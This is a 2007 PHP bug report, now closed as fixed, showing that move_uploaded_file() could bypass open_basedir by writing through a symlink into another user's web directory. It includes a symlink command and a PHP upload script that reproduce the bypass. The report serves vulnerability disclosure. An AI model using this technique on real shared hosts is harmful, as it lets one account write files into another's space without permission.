ID: 40931 Updated by: [EMAIL PROTECTED] Reported By: vladimir at petrov dot ks dot ua -Status: Assigned +Status: Closed Bug Type: Safe Mode/open_basedir Operating System: Linix PHP Version: 5.2.1 Assigned To: tony2001 New Comment:
This bug has been fixed in CVS. Snapshots of the sources are packaged every three hours; this change will be in the next snapshot. You can grab the snapshot at http://snaps.php.net/. Thank you for the report, and for helping us make PHP better. Previous Comments: ------------------------------------------------------------------------ [2007-03-27 21:19:24] vladimir at petrov dot ks dot ua I have sent access information to my server to [EMAIL PROTECTED] I see this bug really working. ------------------------------------------------------------------------ [2007-03-27 20:33:26] [EMAIL PROTECTED] Cannot reproduce. ------------------------------------------------------------------------ [2007-03-27 19:59:46] vladimir at petrov dot ks dot ua open_basedir actually used. If I try to write directly to target directory by move_uploaded_file($_FILES["userfile"]["tmp_name"],"/home/user2/public_html/file.ext") I got proper error message in browser and in the apache error log. ------------------------------------------------------------------------ [2007-03-27 18:40:17] [EMAIL PROTECTED] Make sure the open_basedir option is actually used and not overriden in another way. ------------------------------------------------------------------------ [2007-03-27 18:30:13] vladimir at petrov dot ks dot ua Description: ------------ User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory. Reproduce code: --------------- user1 will upload file to user2's /home/user2/public_html folder. We have in /etc/passwd: user1:x:32001:32001::/home/user1:/bin/bash user2:x:32002:32002::/home/user2:/bin/bash Target folder allows to write for anybody: # ls -lA /home/user2 drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/ Apache have mod_php intalled. Apache config for user1: <VirtualHost xxx.xxx.xxx.xxx> ServerName user1.xxxxxxx.com DocumentRoot /home/user1/public_html User user1 php_admin_value open_basedir "/home/user1" </VirtualHost> User user1 can do something like: $ cd /home/user1/public_html/ $ ln -s /home/user2/public_html user2_public_html $ echo '<html><body> <? if ( isset($_FILES["userfile"]) ) { echo "Upload "; if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext")) echo "ok"; else echo "failed"; } ?> <form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> <input type="file" name="userfile"> <input type="submit"> </body></html>' > upload.php Expected result: ---------------- If we access http://user1.xxxxxxx.com/upload.php after file upload expected message "Upload failed" and no file /home/user2/public_html/file.ext in target folder. Actual result: -------------- If we access http://user1.xxxxxxx.com/upload.php after file upload we got message "Upload ok" and file /home/user2/public_html/file.ext well exist in target folder. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=40931&edit=1
